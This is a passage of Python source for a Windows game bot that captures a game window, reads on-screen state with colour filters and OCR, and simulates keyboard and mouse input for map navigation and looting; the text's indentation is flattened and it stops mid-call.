warnings.simplefilter("ignore", DeprecationWarning)
class HsvFilter:
def __init__(self, hMin=None, sMin=None, vMin=None, hMax=None, sMax=None, vMax=None,
sAdd=None, sSub=None, vAdd=None, vSub=None):
self.hMin = hMin
self.sMin = sMin
self.vMin = vMin
self.hMax = hMax
self.sMax = sMax
self.vMax = vMax
self.sAdd = sAdd
self.sSub = sSub
self.vAdd = vAdd
self.vSub = vSub
class WindowCapture:
w = 0
h = 0
hwnd = None
cropped_x = 0
cropped_y = 0
offset_x = 0
offset_y = 0
def __init__(self, window_name=None, custom_rect=None):
self.custom_rect = custom_rect
self.window_name = window_name
if window_name is None:
self.hwnd = win32gui.GetDesktopWindow()
else:
self.hwnd = win32gui.FindWindow(None, window_name)
if not self.hwnd:
raise Exception('Window not found: {}'.format(window_name))
# Declare all the class variables
self.w, self.h, self.cropped_x, self.cropped_y
self.offset_x, self.offset_y
self.update_window_position()
def get_screenshot(self, stagger=False):
# get the window image data
try:
wDC = win32gui.GetWindowDC(self.hwnd)
dcObj = win32ui.CreateDCFromHandle(wDC)
cDC = dcObj.CreateCompatibleDC()
dataBitMap = win32ui.CreateBitmap()
dataBitMap.CreateCompatibleBitmap(dcObj, self.w, self.h)
cDC.SelectObject(dataBitMap)
cDC.BitBlt((0, 0), (self.w, self.h), dcObj,
(self.cropped_x, self.cropped_y), win32con.SRCCOPY)
except Exception as e:
print(e)
# print("Error with window handle, trying to continue")
count = 0
result = False
while not result:
time.sleep(0.05)
if stagger:
time.sleep(0.5)
try:
dcObj.DeleteDC()
cDC.DeleteDC()
win32gui.ReleaseDC(self.hwnd, wDC)
win32gui.DeleteObject(dataBitMap.GetHandle())
except:
pass
try:
self.hwnd = win32gui.FindWindow(None, self.window_name)
self.update_window_position()
wDC = win32gui.GetWindowDC(self.hwnd)
dcObj = win32ui.CreateDCFromHandle(wDC)
cDC = dcObj.CreateCompatibleDC()
dataBitMap = win32ui.CreateBitmap()
cDC.SelectObject(dataBitMap)
dataBitMap.CreateCompatibleBitmap(dcObj, self.w, self.h)
cDC.SelectObject(dataBitMap)
cDC.BitBlt((0, 0), (self.w, self.h), dcObj,
(self.cropped_x, self.cropped_y), win32con.SRCCOPY)
result = True
except Exception as e:
try:
dcObj.DeleteDC()
cDC.DeleteDC()
win32gui.ReleaseDC(self.hwnd, wDC)
win32gui.DeleteObject(dataBitMap.GetHandle())
except:
pass
count += 1
if count > 50:
# WindowCapture.list_window_names()
print(e)
print("Could not do handle multiple times")
os._exit(1)
# cDC.SelectObject(dataBitMap)
# cDC.BitBlt((0, 0), (self.w, self.h), dcObj,
# (self.cropped_x, self.cropped_y), win32con.SRCCOPY)
# convert the raw data into a format opencv can read
signedIntsArray = dataBitMap.GetBitmapBits(True)
img = np.fromstring(signedIntsArray, dtype='uint8')
img.shape = (self.h, self.w, 4)
# free resources
dcObj.DeleteDC()
cDC.DeleteDC()
win32gui.ReleaseDC(self.hwnd, wDC)
win32gui.DeleteObject(dataBitMap.GetHandle())
# drop the alpha channel
img = img[..., :3]
# make image C_CONTIGUOUS
img = np.ascontiguousarray(img)
return img
def focus_window(self):
win32gui.SetForegroundWindow(self.hwnd)
@staticmethod
def list_window_names():
def winEnumHandler(hwnd, ctx):
if win32gui.IsWindowVisible(hwnd):
print(hex(hwnd), win32gui.GetWindowText(hwnd))
win32gui.EnumWindows(winEnumHandler, None)
def update_window_position(self, border=True):
self.window_rect = win32gui.GetWindowRect(self.hwnd)
self.w = self.window_rect[2] - self.window_rect[0]
self.h = self.window_rect[3] - self.window_rect[1]
border_pixels = 8
titlebar_pixels = 30
if self.custom_rect is None:
if border:
self.w = self.w - (border_pixels * 2)
self.h = self.h - titlebar_pixels - border_pixels
self.cropped_x = border_pixels
self.cropped_y = titlebar_pixels
else:
self.cropped_x = 0
self.cropped_y = 0
self.w += 3
else:
self.w = self.custom_rect[2] - self.custom_rect[0]
self.h = self.custom_rect[3] - self.custom_rect[1]
self.cropped_x = self.custom_rect[0]
self.cropped_y = self.custom_rect[1]
self.offset_x = self.window_rect[0] + self.cropped_x
self.offset_y = self.window_rect[1] + self.cropped_y
# WARNING: need to call the update_window_position function to prevent errors
# That would come from moving the window after starting the bot
def get_screen_position(self, pos):
return (pos[0] + self.offset_x, pos[1] + self.offset_y)
class BotUtils:
def grab_online_servers():
output = subprocess.run("arp -a", capture_output=True).stdout.decode()
list_ips = []
with open("servers.txt", "r") as f:
lines = f.readlines()
for ip in lines:
if ip.strip() in output:
list_ips.append(ip.strip())
return list_ips
def grab_current_lan_ip():
output = subprocess.run(
"ipconfig", capture_output=True).stdout.decode()
_, output = output.split("IPv4 Address. . . . . . . . . . . : 169")
output, _ = output.split("Subnet Mask", maxsplit=1)
current_lan_ip = "169" + output.strip()
return current_lan_ip
def start_server_threads(list_servers):
for server in list_servers:
t = threading.Thread(target=server.main_loop)
t.start()
def grab_closest(rel_list: list):
closest_index = False
smallest_dist = 100000
for i, pair in enumerate(rel_list):
x = abs(pair[0])
y = abs(pair[1])
hypot = math.hypot(x, y)
if hypot < smallest_dist:
smallest_dist = hypot
closest_index = i
return closest_index
def grab_order_closeness(relatives):
dists = []
for x, y in relatives:
dists.append(math.hypot(x, y))
return sorted(range(len(dists)), key=dists.__getitem__)
def grab_order_lowest_y(coords):
sorted_by_second = sorted(coords, key=lambda tup: tup[1], reverse=True)
return sorted_by_second
def move_bigmap_dynamic(x, y, gamename=False, rect=False, checkmap=True, margin=1):
if checkmap:
while not BotUtils.detect_bigmap_open(gamename):
BotUtils.try_toggle_map_clicking()
time.sleep(0.03)
else:
BotUtils.try_toggle_map()
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
# Then need to find where the player is
if not rect:
rect = [561, 282, 1111, 666]
playerx, playery = BotUtils.grab_player_posv2(gamename, rect)
if not playerx:
if not checkmap:
time.sleep(0.5)
BotUtils.try_toggle_map()
time.sleep(0.005)
playerx, playery = BotUtils.grab_player_posv2(gamename, rect)
if not playerx:
return False
else:
time.sleep(0.5)
BotUtils.try_toggle_map()
time.sleep(0.005)
playerx, playery = BotUtils.grab_player_posv2(gamename, rect)
if not playerx:
print("Unable to find player")
return False
relx = x - playerx
rely = playery - y
follower = Follower(margin)
noplyr_count = 0
while abs(relx) > margin or abs(rely) > margin:
rect = [playerx - 50, playery - 50, playerx + 50, playery + 50]
playerx, playery = BotUtils.grab_player_posv2(gamename, rect)
if playerx:
if noplyr_count > 0:
noplyr_count -= 1
relx = x - playerx
rely = playery - y
follower.navigate_towards(relx, rely)
else:
noplyr_count += 1
if noplyr_count > 10:
break
time.sleep(0.02)
follower.release_all_keys()
BotUtils.try_toggle_map()
if noplyr_count > 10:
return False
else:
return True
# Angle is left->right travel of room angle, north being 0deg
def move_diagonal(x, y, speed=20, rel=False, gamename=False, angle=90):
# If not a direct relative move command
if not rel:
BotUtils.try_toggle_map()
time.sleep(0.1)
if not BotUtils.detect_bigmap_open(gamename):
# print("Didn't detect bigmap first time")
time.sleep(0.5)
BotUtils.try_toggle_map_clicking()
# BotUtils.try_toggle_map_clicking()
time.sleep(0.1)
player_pos = BotUtils.grab_player_pos(gamename)
# print("Player pos detected by diag:{}".format(player_pos))
start_time = time.time()
while not player_pos[0]:
print("Attempting to find player again")
time.sleep(0.05)
if not BotUtils.detect_bigmap_open(gamename):
BotUtils.try_toggle_map_clicking()
if not BotUtils.detect_bigmap_open(gamename):
BotUtils.try_toggle_map()
time.sleep(0.05)
player_pos = BotUtils.grab_player_pos(gamename)
if time.time() - start_time > 5:
print("Error with finding player")
os._exit(1)
BotUtils.close_map_and_menu(gamename)
relx = player_pos[0] - int(x)
rely = int(y) - player_pos[1]
while abs(relx) > 100 or abs(rely > 100):
# print("Travel distance is too far, x:{},y:{}".format(relx, rely))
# CustomInput.press_key(CustomInput.key_map["right"], "right")
# time.sleep(0.01)
# CustomInput.release_key(CustomInput.key_map["right"], "right")
time.sleep(0.4)
if not BotUtils.detect_bigmap_open(gamename):
print("trying to open map again")
BotUtils.try_toggle_map_clicking()
time.sleep(0.3)
player_pos = BotUtils.grab_player_pos(gamename)
relx = player_pos[0] - int(x)
rely = int(y) - player_pos[1]
BotUtils.close_map_and_menu(gamename)
# Otherwise treat x,y as direct commands
else:
relx = x
rely = y
mult = 0.707
if relx > 0:
keyx = "left"
CustomInput.press_key(CustomInput.key_map["left"], "left")
timeleftx = float("{:.4f}".format(abs(relx/(speed*mult))))
elif relx < 0:
keyx = "right"
CustomInput.press_key(CustomInput.key_map["right"], "right")
timeleftx = float("{:.4f}".format(abs(relx/(speed*mult))))
else:
keyx = "right"
timeleftx = 0
mult = 1
if rely > 0:
keyy = "down"
CustomInput.press_key(CustomInput.key_map["down"], "down")
timelefty = float("{:.4f}".format(abs(rely/(speed*mult))))
elif rely < 0:
keyy = "up"
CustomInput.press_key(CustomInput.key_map["up"], "up")
timelefty = float("{:.4f}".format(abs(rely/(speed*mult))))
else:
keyy = "up"
timelefty = 0
if relx != 0:
timeleftx = float("{:.4f}".format(abs(relx/speed)))
first_sleep = min([timeleftx, timelefty])
second_sleep = max([timeleftx, timelefty])
first_key = [keyx, keyy][[timeleftx, timelefty].index(first_sleep)]
second_key = [keyx, keyy][[timeleftx, timelefty].index(second_sleep)]
if first_sleep < 0.009:
if second_sleep < 0.009:
pass
else:
time.sleep(second_sleep-0.009)
CustomInput.release_key(
CustomInput.key_map[second_key], second_key)
elif timelefty == timeleftx:
time.sleep(first_sleep-0.009)
CustomInput.release_key(CustomInput.key_map[first_key], first_key)
CustomInput.release_key(
CustomInput.key_map[second_key], second_key)
else:
time.sleep(first_sleep - 0.009)
CustomInput.release_key(CustomInput.key_map[first_key], first_key)
time.sleep((second_sleep-first_sleep-0.009)*mult)
CustomInput.release_key(
CustomInput.key_map[second_key], second_key)
def move_towards(value, dir):
if dir == "x":
if value > 0:
key = "left"
else:
key = "right"
elif dir == "y":
if value > 0:
key = "down"
else:
key = "up"
CustomInput.press_key(CustomInput.key_map[key], key)
def move_to(gamename, x, y, angle=90, yfirst=True, speed=22.5, loot=False, plyr=False, rel=False):
if not rel:
if not BotUtils.detect_bigmap_open(gamename):
BotUtils.try_toggle_map()
player_pos = BotUtils.grab_player_pos(gamename)
start_time = time.time()
while not player_pos:
time.sleep(0.05)
if not BotUtils.detect_bigmap_open(gamename):
BotUtils.try_toggle_map()
time.sleep(0.05)
player_pos = BotUtils.grab_player_pos(gamename)
if time.time() - start_time > 5:
print("Error with finding player")
os._exit(1)
BotUtils.close_map_and_menu(gamename)
relx = player_pos[0] - int(x)
rely = int(y) - player_pos[1]
while abs(relx) > 100 or abs(rely > 100):
CustomInput.press_key(CustomInput.key_map["right"], "right")
CustomInput.release_key(CustomInput.key_map["right"], "right")
time.sleep(0.02)
player_pos = BotUtils.grab_player_pos(gamename)
relx = player_pos[0] - int(x)
rely = int(y) - player_pos[1]
else:
relx = x
rely = y
if not yfirst:
if not loot:
BotUtils.resolve_dir_v2(relx, "x", speed)
BotUtils.resolve_dir_v2(rely, "y", speed)
else:
lootfound = BotUtils.resolve_dir_with_looting(
relx, "x", speed, gamename)
if lootfound:
Looting.grab_all_visible_loot(gamename, plyr)
# Continue to destination without further looting (prevent stuck)
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
# When at destination check for loot again
if Looting.check_for_loot(gamename):
Looting.grab_all_visible_loot(gamename, plyr)
# If needs be return to destination
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
else:
lootfound = BotUtils.resolve_dir_with_looting(
rely, "y", speed, gamename)
if lootfound:
Looting.grab_all_visible_loot(gamename, plyr)
# Continue to destination without further looting (prevent stuck)
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
# When at destination check for loot again
if Looting.check_for_loot(gamename):
Looting.grab_all_visible_loot(gamename, plyr)
# If needs be return to destination
BotUtils.move_to(
gamename, x, y, angle, yfirst, speed)
else:
if not loot:
BotUtils.resolve_dir_v2(rely, "y", speed)
BotUtils.resolve_dir_v2(relx, "x", speed)
else:
lootfound = BotUtils.resolve_dir_with_looting(
rely, "y", speed, gamename)
if lootfound:
Looting.grab_all_visible_loot(gamename, plyr)
# Continue to destination without further looting (prevent stuck)
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
# When at destination check for loot again
if Looting.check_for_loot(gamename):
Looting.grab_all_visible_loot(gamename, plyr)
# If needs be return to destination
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
else:
lootfound = BotUtils.resolve_dir_with_looting(
relx, "x", speed, gamename)
if lootfound:
Looting.grab_all_visible_loot(gamename, plyr)
# Continue to destination without further looting (prevent stuck)
BotUtils.move_to(gamename, x, y, angle, yfirst, speed)
# When at destination check for loot again
if Looting.check_for_loot(gamename):
Looting.grab_all_visible_loot(gamename, plyr)
# If needs be return to destination
BotUtils.move_to(
gamename, x, y, angle, yfirst, speed)
def resolve_dir_v2(value, dir, speed):
if dir == "x":
if value > 0:
key = "left"
else:
key = "right"
elif dir == "y":
if value > 0:
key = "down"
else:
key = "up"
time_reqd = abs(value/speed)
if time_reqd > 0.003:
CustomInput.press_key(CustomInput.key_map[key], key)
time.sleep(time_reqd-0.003)
CustomInput.release_key(CustomInput.key_map[key], key)
def resolve_dir_with_looting(value, dir, speed, gamename):
if dir == "x":
if value > 0:
key = "left"
else:
key = "right"
elif dir == "y":
if value > 0:
key = "down"
else:
key = "up"
time_reqd = abs(value/speed)
start_time = time.time()
if time_reqd > 0.003:
CustomInput.press_key(CustomInput.key_map[key], key)
# Maximum lootcheck time is about 0.3secs worst case
# Nominal is about 0.2s
if time_reqd < 2:
time.sleep(time_reqd-0.003)
CustomInput.release_key(CustomInput.key_map[key], key)
else:
BotUtils.close_map(gamename)
loops = math.floor(time_reqd/2)
for i in range(loops):
time.sleep(1.65)
result = Looting.check_for_loot(gamename)
if result:
CustomInput.release_key(CustomInput.key_map[key], key)
return True
time_left = start_time+time_reqd-time.time()
time.sleep(time_left)
CustomInput.release_key(CustomInput.key_map[key], key)
return Looting.check_for_loot(gamename)
def resolve_single_direction(speed, value, dir, PAG=False):
if not PAG:
sleep_time = 0.003
else:
sleep_time = 0.1
if dir == "x":
if value > 0:
key = "left"
else:
key = "right"
elif dir == "y":
if value > 0:
key = "down"
else:
key = "up"
time_reqd = abs(value/speed)
key_map = CustomInput.grab_key_dict()
if not PAG:
CustomInput.press_key(key_map[key], key)
else:
pydirectinput.keyDown(key)
try:
time.sleep(time_reqd-sleep_time)
except:
pass
if not PAG:
CustomInput.release_key(key_map[key], key)
else:
pydirectinput.keyDown(key)
def list_window_names():
def winEnumHandler(hwnd, ctx):
if win32gui.IsWindowVisible(hwnd):
print(hex(hwnd), win32gui.GetWindowText(hwnd))
win32gui.EnumWindows(winEnumHandler, None)
def grab_hpbar_locations(gamename=False):
if gamename:
wincap = WindowCapture(gamename, [100, 135, 1223, 688])
original_image = wincap.get_screenshot()
else:
original_image = cv2.imread(os.path.dirname(
os.path.abspath(__file__)) + "/testimages/healthbars.jpg")
filter = HsvFilter(20, 174, 245, 26, 193, 255, 0, 0, 0, 0)
output_image = BotUtils.filter_blackwhite_invert(
filter, original_image, True)
output_image = cv2.blur(output_image, (2, 2))
_, thresh = cv2.threshold(output_image, 127, 255, 0)
contours, _ = cv2.findContours(
thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
if len(contours) < 2:
return False
contours.pop(0)
rectangles = []
for contour in contours:
(x, y), _ = cv2.minEnclosingCircle(contour)
rectangles.append([x-10, y, 20, 5])
rectangles.append([x-10, y, 20, 5])
rectangles, _ = cv2.groupRectangles(
rectangles, groupThreshold=1, eps=0.8)
points = []
for (x, y, w, h) in rectangles:
center_x = x + int(w/2)
center_y = y + int(h/2)
points.append((center_x, center_y))
return points
def grab_character_location(player_name, gamename=False):
player_chars = "".join(set(player_name))
if gamename:
wincap = WindowCapture(gamename, [200, 235, 1123, 688])
original_image = wincap.get_screenshot()
else:
original_image = cv2.imread(os.path.dirname(
os.path.abspath(__file__)) + "/testimages/test_sensitive.jpg")
filter = HsvFilter(0, 0, 119, 179, 49, 255, 0, 0, 0, 0)
output_image = BotUtils.filter_blackwhite_invert(
filter, original_image, return_gray=True)
rgb = cv2.cvtColor(output_image, cv2.COLOR_GRAY2RGB)
tess_config = '--psm 6 --oem 3 -c tessedit_char_whitelist=' + player_chars
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng', config=tess_config)
try:
best_match, _ = process.extractOne(
player_name, results["text"], score_cutoff=0.8)
i = results["text"].index(best_match)
x = int(results["left"][i] + (results["width"][i]/2))
y = int(results["top"][i] + (results["height"][i]/2))
# Account for the rect
x += 200
y += 235
return x, y
except:
return 640, 382
def shift_channel(c, amount):
if amount > 0:
lim = 255 - amount
c[c >= lim] = 255
c[c < lim] += amount
elif amount < 0:
amount = -amount
lim = amount
c[c <= lim] = 0
c[c > lim] -= amount
return c
def filter_blackwhite_invert(filter: HsvFilter, existing_image, return_gray=False, threshold=67, max=255):
hsv = cv2.cvtColor(existing_image, cv2.COLOR_BGR2HSV)
hsv_filter = filter
# add/subtract saturation and value
h, s, v = cv2.split(hsv)
s = BotUtils.shift_channel(s, hsv_filter.sAdd)
s = BotUtils.shift_channel(s, -hsv_filter.sSub)
v = BotUtils.shift_channel(v, hsv_filter.vAdd)
v = BotUtils.shift_channel(v, -hsv_filter.vSub)
hsv = cv2.merge([h, s, v])
# Set minimum and maximum HSV values to display
lower = np.array([hsv_filter.hMin, hsv_filter.sMin, hsv_filter.vMin])
upper = np.array([hsv_filter.hMax, hsv_filter.sMax, hsv_filter.vMax])
# Apply the thresholds
mask = cv2.inRange(hsv, lower, upper)
result = cv2.bitwise_and(hsv, hsv, mask=mask)
# convert back to BGR
img = cv2.cvtColor(result, cv2.COLOR_HSV2BGR)
# now change it to greyscale
grayImage = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# now change it to black and white
(thresh, blackAndWhiteImage) = cv2.threshold(
grayImage, threshold, max, cv2.THRESH_BINARY)
# now invert it
inverted = (255-blackAndWhiteImage)
if return_gray:
return inverted
inverted = cv2.cvtColor(inverted, cv2.COLOR_GRAY2BGR)
return inverted
def convert_pynput_to_pag(button):
PYNPUT_SPECIAL_CASE_MAP = {
'alt_l': 'altleft',
'alt_r': 'altright',
'alt_gr': 'altright',
'caps_lock': 'capslock',
'ctrl_l': 'ctrlleft',
'ctrl_r': 'ctrlright',
'page_down': 'pagedown',
'page_up': 'pageup',
'shift_l': 'shiftleft',
'shift_r': 'shiftright',
'num_lock': 'numlock',
'print_screen': 'printscreen',
'scroll_lock': 'scrolllock',
}
# example: 'Key.F9' should return 'F9', 'w' should return as 'w'
cleaned_key = button.replace('Key.', '')
if cleaned_key in PYNPUT_SPECIAL_CASE_MAP:
return PYNPUT_SPECIAL_CASE_MAP[cleaned_key]
return cleaned_key
def detect_player_name(gamename):
plyrname_rect = [165, 45, 320, 65]
plyrname_wincap = WindowCapture(gamename, plyrname_rect)
plyrname_filt = HsvFilter(0, 0, 103, 89, 104, 255, 0, 0, 0, 0)
# get an updated image of the game
image = plyrname_wincap.get_screenshot()
# pre-process the image
image = BotUtils.apply_hsv_filter(
image, plyrname_filt)
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
results = pytesseract.image_to_data(
rgb, output_type=pytesseract.Output.DICT, lang='eng')
biggest = 0
name = False
for entry in results["text"]:
if len(entry) > biggest:
name = entry
biggest = len(entry)
return name
def detect_level_name(gamename, chars=False):
wincap = WindowCapture(gamename, [1121, 31, 1248, 44])
existing_image = wincap.get_screenshot()
filter = HsvFilter(0, 0, 0, 169, 34, 255, 0, 0, 0, 0)
save_image = BotUtils.apply_hsv_filter(existing_image, filter)
gray_image = cv2.cvtColor(save_image, cv2.COLOR_BGR2GRAY)
(thresh, blackAndWhiteImage) = cv2.threshold(
gray_image, 129, 255, cv2.THRESH_BINARY)
# now invert it
inverted = (255-blackAndWhiteImage)
save_image = cv2.cvtColor(inverted, cv2.COLOR_GRAY2BGR)
rgb = cv2.cvtColor(save_image, cv2.COLOR_BGR2RGB)
if not chars:
chars = "01234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
tess_config = '--psm 7 --oem 3 -c tessedit_char_whitelist=' + chars
result = pytesseract.image_to_string(
rgb, lang='eng', config=tess_config)[:-2]
return result
def apply_hsv_filter(original_image, hsv_filter: HsvFilter):
# convert image to HSV
hsv = cv2.cvtColor(original_image, cv2.COLOR_BGR2HSV)
# add/subtract saturation and value
h, s, v = cv2.split(hsv)
s = BotUtils.shift_channel(s, hsv_filter.sAdd)
s = BotUtils.shift_channel(s, -hsv_filter.sSub)
v = BotUtils.shift_channel(v, hsv_filter.vAdd)
v = BotUtils.shift_channel(v, -hsv_filter.vSub)
hsv = cv2.merge([h, s, v])
# Set minimum and maximum HSV values to display
lower = np.array([hsv_filter.hMin, hsv_filter.sMin, hsv_filter.vMin])
upper = np.array([hsv_filter.hMax, hsv_filter.sMax, hsv_filter.vMax])
# Apply the thresholds
mask = cv2.inRange(hsv, lower, upper)
result = cv2.bitwise_and(hsv, hsv, mask=mask)
# convert back to BGR for imshow() to display it properly
img = cv2.cvtColor(result, cv2.COLOR_HSV2BGR)
return img
def detect_sect_clear(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
# wincap = WindowCapture(gamename, custom_rect=[
# 464+156, 640, 464+261, 741])
wincap = WindowCapture(gamename, custom_rect=[
464+29, 640, 464+261, 641])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][127]]
g, h, i = [int(i) for i in image[0][-1]]
j, k, l = [int(i) for i in image[0][163]]
m, n, o = [int(i) for i in image[0][6]]
p, q, r = [int(i) for i in image[0][122]]
if a+b+c > 760:
if d+e+f > 760:
if j+k+l > 760:
# This is a false positive
return False
if m+n+o > 760:
# This is a false positive
return False
if p+q+r > 760:
# This is a false positive
return False
if g+h+i > 760:
# cv2.imwrite("testytest.jpg", image)
return True
return False
def detect_boss_healthbar(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, custom_rect=[
415+97, 105+533, 415+98, 105+534])
image = wincap.get_screenshot()
# bgr
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if c+f > 440:
if a+b+d+e < 80:
return True
return False
def detect_xprompt(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, custom_rect=[
1137, 694, 1163, 695])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a+b+d+e > 960 and c+f == 140:
return True
else:
return False
def detect_gold_amount(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, [681, 473, 748, 490])
image = wincap.get_screenshot()
# cv2.imwrite("testytest.jpg", image)
tess_config = '--psm 8 --oem 3 -c tessedit_char_whitelist=0123456789,'
result = pytesseract.image_to_string(
image, lang='eng', config=tess_config)[:-2].replace(",", "")
try:
return int(result)
except:
image = wincap.get_screenshot()
# cv2.imwrite("testytest.jpg", image)
tess_config = '--psm 8 --oem 3 -c tessedit_char_whitelist=0123456789,'
result = pytesseract.image_to_string(
image, lang='eng', config=tess_config)[:-2].replace(",", "")
try:
return int(result)
except:
print("Unable to detect gold value, see image saved")
return 0
def detect_petmenu_open(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, [604, 120, 657, 122])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][8]]
g, h, i = [int(i) for i in image[0][-1]]
if a + g == 76:
if d+e+f > 750:
return True
return False
def grab_player_pos(gamename=False, map_rect=False, rect_rel=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
if not map_rect:
map_rect = [561, 282, 1111, 666]
wincap = WindowCapture(gamename, map_rect)
filter = HsvFilter(34, 160, 122, 50, 255, 255, 0, 0, 0, 0)
image = wincap.get_screenshot()
save_image = BotUtils.filter_blackwhite_invert(filter, image)
# cv2.imwrite("C:\\Games\\first" +
# str(random.randint(0, 10000))+".jpg", save_image)
vision = Vision('plyr.jpg')
rectangles = vision.find(
save_image, threshold=0.31, epsilon=0.5)
if len(rectangles) < 1:
return False, False
points = vision.get_click_points(rectangles)
x, y = points[0]
if rect_rel:
return x, y
else:
x += map_rect[0]
y += map_rect[1]
return x, y
def grab_player_posv2(gamename=False, map_rect=False, rect_rel=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
if not map_rect:
map_rect = [561, 282, 1111, 666]
wincap = WindowCapture(gamename, map_rect)
vision = VisionRGB("plyrv2.jpg")
screenshot = wincap.get_screenshot()
output_image = cv2.blur(screenshot, (6, 6))
rgb_filter = RgbFilter(79, 129, 0, 140, 206, 65)
output_image = vision.apply_rgb_filter(output_image, rgb_filter)
rectangles = vision.find(
output_image, threshold=0.41, epsilon=0.5)
if len(rectangles) < 1:
return False, False
else:
points = vision.get_click_points(rectangles)
# If more than one point detected
# Need to choose the one closest to rect centre
if len(points) > 1:
midx = 0.5*(map_rect[2] - map_rect[0]) + map_rect[0]
midy = 0.5*(map_rect[3] - map_rect[1]) + map_rect[1]
# Then convert lootlist to rel_pos list
relatives = BotUtils.convert_list_to_rel(
points, midx, midy, 150)
# Grab the indexes in ascending order of closesness
order = BotUtils.grab_order_closeness(relatives)
# Then reorder the lootlist to match
points = [x for _, x in sorted(zip(order, points))]
if rect_rel:
return points[0]
x = points[0][0] + map_rect[0]
y = points[0][1] + map_rect[1]
return x, y
def grab_level_rects():
rects = {}
# Load the translation from name to num
with open("lvl_name_num.txt") as f:
num_names = f.readlines()
for i, entry in enumerate(num_names):
num_names[i] = entry.split("-")
# Load the num to rect catalogue
with open("catalogue.txt") as f:
nums_rects = f.readlines()
for i, entry in enumerate(nums_rects):
nums_rects[i] = entry.split("-")
# Then add each rect to the rects dict against name
for number, name in num_names:
for num, area, rect in nums_rects:
if area == "FM" and num == number:
rects[name.rstrip().replace(" ", "")] = rect.rstrip()
if "1" in name:
rects[name.rstrip().replace(
" ", "").replace("1", "L")] = rect.rstrip()
if "ri" in name:
rects[name.rstrip().replace(
" ", "").replace("ri", "n").replace("1", "L")] = rect.rstrip()
break
return rects
def grab_level_rects_and_speeds():
rects = {}
speeds = {}
# Load the translation from name to num
with open("lvl_name_num.txt") as f:
num_names = f.readlines()
for i, entry in enumerate(num_names):
num_names[i] = entry.split("-")
# Load the num to rect catalogue
with open("catalogue.txt") as f:
nums_rects = f.readlines()
for i, entry in enumerate(nums_rects):
nums_rects[i] = entry.split("-")
# Finally load the level speeds
with open("lvl_speed.txt") as f:
num_speeds = f.readlines()
for i, entry in enumerate(num_speeds):
num_speeds[i] = entry.split("|")
# Then add each rect to the rects dict against name
# Also add each speed to the speed dict against name
for number, name in num_names:
for num, area, rect in nums_rects:
if area == "FM" and num == number:
rects[name.rstrip().replace(" ", "")] = rect.rstrip()
if "1" in name:
rects[name.rstrip().replace(
" ", "").replace("1", "L")] = rect.rstrip()
if "ri" in name:
rects[name.rstrip().replace(
" ", "").replace("ri", "n").replace("1", "L")] = rect.rstrip()
break
for num, speed in num_speeds:
if num == number:
speeds[name.rstrip().replace(
" ", "")] = float(speed.rstrip())
if "1" in name:
speeds[name.rstrip().replace(
" ", "").replace("1", "L")] = float(speed.rstrip())
if "ri" in name:
speeds[name.rstrip().replace(
" ", "").replace("ri", "n").replace("1", "L")] = float(speed.rstrip())
break
return rects, speeds
def string_to_rect(string: str):
# This converts the rect from catalogue into int list
return [int(i) for i in string.split(',')]
def move_mouse_centre(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename)
centre_x = int(0.5 * wincap.w +
wincap.window_rect[0])
centre_y = int(0.5 * wincap.h +
wincap.window_rect[1])
ctypes.windll.user32.SetCursorPos(centre_x, centre_y)
def detect_bigmap_open(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, custom_rect=[819, 263, 855, 264])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-2]]
if a+b+c < 30:
if d+e+f > 700:
return True
return False
def detect_menu_open(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
wincap = WindowCapture(gamename, custom_rect=[595, 278, 621, 281])
image = wincap.get_screenshot()
a, b, c = [int(i) for i in image[0][0]]
d, e, f = [int(i) for i in image[0][-1]]
if a+b+c > 700:
if d+e+f > 700:
return True
return False
def convert_list_to_rel(item_list, playerx, playery, yoffset=0):
return_list = []
for item in item_list:
relx = playerx - item[0]
rely = item[1] - playery - yoffset
return_list.append((relx, rely))
return return_list
def close_map_and_menu(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
game_wincap = WindowCapture(gamename)
if BotUtils.detect_menu_open(gamename):
BotUtils.close_esc_menu(game_wincap)
if BotUtils.detect_bigmap_open(gamename):
BotUtils.close_map(game_wincap)
def try_toggle_map():
pydirectinput.keyDown("m")
time.sleep(0.05)
pydirectinput.keyUp("m")
time.sleep(0.08)
def try_toggle_map_clicking(gamename=False):
if not gamename:
with open("gamename.txt") as f:
gamename = f.readline()
game_wincap = WindowCapture(gamename)
ctypes.windll.user32.SetCursorPos(
int(1263+game_wincap.window_rect[0]), int(64+game_wincap.window_rect[1]))
ctypes.windll.user32.mouse_event(
